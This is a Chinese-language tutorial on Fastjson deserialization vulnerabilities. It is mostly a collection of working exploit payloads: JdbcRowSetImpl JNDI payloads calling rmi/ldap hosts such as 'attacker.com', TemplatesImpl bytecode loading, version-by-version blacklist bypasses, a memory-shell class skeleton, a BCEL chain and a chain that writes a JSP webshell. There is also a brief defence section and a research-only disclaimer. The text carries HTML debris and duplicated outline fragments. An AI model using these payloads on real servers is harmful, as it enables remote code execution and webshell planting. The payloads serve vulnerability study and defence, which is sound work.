Fastjson反序列化漏洞全面解析<\/h1>

一、Fastjson基础<\/h2>

1. Fastjson简介<\/h3>
Fastjson是阿里巴巴开发的高性能JSON处理库，主要用于JSON与Java对象之间的转换。主要接口：<\/p>
JSON.toJSONString()<\/code>：序列化（对象→JSON）<\/li>
JSON.parseObject()<\/code>\/JSON.parse()<\/code>：反序列化（JSON→对象）<\/li>
<\/ul>
2. 基本使用示例<\/h3>
\/\/ 序列化示例
<\/span><\/span><\/span><\/span>Student student =<\/span> new<\/span> Student();<\/span>
<\/span><\/span>student.<\/span>setName<\/span>(<\/span>"zjacky"<\/span>);<\/span>
<\/span><\/span>student.<\/span>setAge<\/span>(<\/span>20<\/span>);<\/span>
<\/span><\/span>String jsonString =<\/span> JSON.<\/span>toJSONString<\/span>(<\/span>student);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反序列化示例
<\/span><\/span><\/span><\/span>Student xiaoming =<\/span> JSON.<\/span>parseObject<\/span>(<\/span>"{\"age\":20,\"name\":\"zzzjjjjaaaacccckkkkkyyyy\"}"<\/span>,<\/span> Student.<\/span>class<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>3. 关键特性<\/h3>

@type属性<\/strong>：指定反序列化的目标类<\/li>
SerializerFeature.WriteClassName<\/strong>：序列化时写入类名
String jsonString =<\/span> JSON.<\/span>toJSONString<\/span>(<\/span>student,<\/span> SerializerFeature.<\/span>WriteClassName<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
Feature.SupportNonPublicField<\/strong>：反序列化时支持私有属性
Student xiaoming =<\/span> JSON.<\/span>parseObject<\/span>(<\/span>jsonString,<\/span> Student.<\/span>class<\/span>,<\/span> Feature.<\/span>SupportNonPublicField<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
二、Fastjson反序列化漏洞原理<\/h2>
1. 漏洞成因<\/h3>
Fastjson在反序列化时：<\/p>

根据@type<\/code>指定的类实例化对象<\/li>
自动调用目标类的setter\/getter方法<\/li>
若这些方法中存在危险操作（如命令执行），则可被利用<\/li>
<\/ol>
2. 利用条件<\/h3>

目标类存在危险的setter\/getter方法<\/li>
攻击者能控制反序列化的JSON内容<\/li>
Fastjson版本存在漏洞<\/li>
<\/ul>
3. 关键调用链<\/h3>
JSON.<\/span>parseObject<\/span>()\/<\/span>parse()<\/span>
<\/span><\/span>  →<\/span> 根据<\/span>@type<\/span>实例化指定类<\/span>
<\/span><\/span>    →<\/span> 调用<\/span>setter方法赋值<\/span>
<\/span><\/span>      →<\/span> 若<\/span>setter方法存在危险操作<\/span> →<\/span> RCE
<\/span><\/span><\/code><\/pre>三、各版本漏洞及绕过技术<\/h2>
1. Fastjson <= 1.2.24<\/h3>
利用链<\/strong>：<\/p>

JdbcRowSetImpl(JNDI)<\/strong>
{
<\/span><\/span>  "@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>,
<\/span><\/span>  "dataSourceName"<\/span>:"rmi:\/\/127.0.0.1:1099\/exploit"<\/span>,
<\/span><\/span>  "autoCommit"<\/span>:true<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
TemplatesImpl(字节码加载)<\/strong>
{
<\/span><\/span>  "@type"<\/span>:"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"<\/span>,
<\/span><\/span>  "_bytecodes"<\/span>:["恶意字节码base64"<\/span>],
<\/span><\/span>  "_name"<\/span>:"a.b"<\/span>,
<\/span><\/span>  "_tfactory"<\/span>:{},
<\/span><\/span>  "_outputProperties"<\/span>:{}
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2. Fastjson 1.2.25-1.2.41<\/h3>
绕过方式<\/strong>：L开头;结尾<\/p>
{
<\/span><\/span>  "@type"<\/span>:"Lcom.sun.rowset.JdbcRowSetImpl;"<\/span>,
<\/span><\/span>  "dataSourceName"<\/span>:"rmi:\/\/127.0.0.1:1099\/exploit"<\/span>,
<\/span><\/span>  "autoCommit"<\/span>:true<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. Fastjson 1.2.42<\/h3>
绕过方式<\/strong>：双写LL和;;<\/p>
{
<\/span><\/span>  "@type"<\/span>:"LLcom.sun.rowset.JdbcRowSetImpl;;"<\/span>,
<\/span><\/span>  "dataSourceName"<\/span>:"rmi:\/\/127.0.0.1:1099\/exploit"<\/span>,
<\/span><\/span>  "autoCommit"<\/span>:true<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. Fastjson 1.2.43<\/h3>
绕过方式<\/strong>：使用[开头<\/p>
{
<\/span><\/span>  "@type"<\/span>:"[com.sun.rowset.JdbcRowSetImpl"<\/span>[{,<\/span>
<\/span><\/span>  "dataSourceName"<\/span>:"rmi:\/\/127.0.0.1:1099\/exploit"<\/span>,
<\/span><\/span>  "autoCommit"<\/span>:true<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. Fastjson 1.2.25-1.2.47通杀<\/h3>
利用链<\/strong>：缓存绕过<\/p>
{
<\/span><\/span>  "a"<\/span>:{
<\/span><\/span>    "@type"<\/span>:"java.lang.Class"<\/span>,
<\/span><\/span>    "val"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>
<\/span><\/span>  },
<\/span><\/span>  "b"<\/span>:{
<\/span><\/span>    "@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>,
<\/span><\/span>    "dataSourceName"<\/span>:"rmi:\/\/127.0.0.1:1099\/exploit"<\/span>,
<\/span><\/span>    "autoCommit"<\/span>:true<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>四、不出网利用技术<\/h2>
1. TemplatesImpl内存马<\/h3>
public<\/span> class<\/span> EvilClass<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>  public<\/span> EvilClass<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 内存马植入代码
<\/span><\/span><\/span><\/span>    WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>()<\/span>
<\/span><\/span>      .<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span>    \/\/ ...注册内存马
<\/span><\/span><\/span><\/span>  }<\/span>
<\/span><\/span>  \/\/ 必须实现的方法
<\/span><\/span><\/span><\/span>  public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> SerializationHandler[]<\/span> handlers){}<\/span>
<\/span><\/span>  public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> DTMAxisIterator iterator,<\/span> SerializationHandler handler){}<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. BasicDataSource(BCEL)<\/h3>
{
<\/span><\/span>  {<\/span>
<\/span><\/span>    "aaa"<\/span>: {
<\/span><\/span>      "@type"<\/span>: "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"<\/span>,
<\/span><\/span>      "driverClassLoader"<\/span>: {
<\/span><\/span>        "@type"<\/span>: "com.sun.org.apache.bcel.internal.util.ClassLoader"<\/span>
<\/span><\/span>      },
<\/span><\/span>      "driverClassName"<\/span>: "
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>BCEL
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>$恶意字节码..."<\/span>
<\/span><\/span>    }
<\/span><\/span>  }:<\/span> "bbb"<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. Commons-io写文件<\/h3>
{
<\/span><\/span>  "x"<\/span>:{
<\/span><\/span>    "@type"<\/span>:"java.lang.AutoCloseable"<\/span>,
<\/span><\/span>    "@type"<\/span>:"sun.rmi.server.MarshalOutputStream"<\/span>,
<\/span><\/span>    "out"<\/span>:{
<\/span><\/span>      "@type"<\/span>:"java.util.zip.InflaterOutputStream"<\/span>,
<\/span><\/span>      "out"<\/span>:{
<\/span><\/span>        "@type"<\/span>:"java.io.FileOutputStream"<\/span>,
<\/span><\/span>        "file"<\/span>:"\/tmp\/shell.jsp"<\/span>,
<\/span><\/span>        "append"<\/span>:false<\/span>
<\/span><\/span>      },
<\/span><\/span>      "infl"<\/span>:{
<\/span><\/span>        "input"<\/span>:"eJwL8nUyNDJSyCxWyEgtSgUAHKUENw=="<\/span>
<\/span><\/span>      },
<\/span><\/span>      "bufLen"<\/span>:1048576<\/span>
<\/span><\/span>    },
<\/span><\/span>    "protocolVersion"<\/span>:1<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>五、检测与防御<\/h2>
1. 版本探测<\/h3>
{"a"<\/span>:"<\/span>  \/\/ 不闭合花括号会暴露版本信息
<\/span><\/span><\/span><\/code><\/pre>2. 防御措施<\/h3>

升级到最新安全版本(>=1.2.83)<\/li>
开启safeMode
ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>setSafeMode<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
严格过滤输入<\/li>
禁用autoType<\/li>
<\/ol>
六、Payload集合<\/h2>
1. 基础Payload<\/h3>
{"@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>,"dataSourceName"<\/span>:"ldap:\/\/attacker.com\/exp"<\/span>,"autoCommit"<\/span>:true<\/span>}
<\/span><\/span><\/code><\/pre>2. 关键字绕过<\/h3>
{"\u0040type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>,"dataSourceName"<\/span>:"rmi:\/\/attacker.com\/exp"<\/span>,"autoCommit"<\/span>:true<\/span>}
<\/span><\/span><\/code><\/pre>3. 智能匹配绕过<\/h3>
{"@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>,"data-source-name"<\/span>:"ldap:\/\/attacker.com\/exp"<\/span>,"auto-commit"<\/span>:true<\/span>}
<\/span><\/span><\/code><\/pre>七、参考资源<\/h2>

Fastjson官方GitHub<\/li>
漏洞分析文章<\/li>
各版本绕过技术详解<\/li>
<\/ol>

注：本文仅供安全研究学习使用，请勿用于非法用途。<\/p>
<\/blockquote>
Fastjson反序列化漏洞全面解析<\/h1>

一、Fastjson基础<\/h2>

二、Fastjson反序列化漏洞原理<\/h2>

三、各版本漏洞及绕过技术<\/h2>

四、不出网利用技术<\/h2>

五、检测与防御<\/h2>

六、Payload集合<\/h2>

七、参考资源<\/h2> Fastjson官方GitHub<\/li> 漏洞分析文章<\/li> 各版本绕过技术详解<\/li> <\/ol> 注：本文仅供安全研究学习使用，请勿用于非法用途。<\/p> <\/blockquote>

七、参考资源<\/h2>

Fastjson官方GitHub<\/li>
漏洞分析文章<\/li>
各版本绕过技术详解<\/li> <\/ol>

注：本文仅供安全研究学习使用，请勿用于非法用途。<\/p> <\/blockquote>
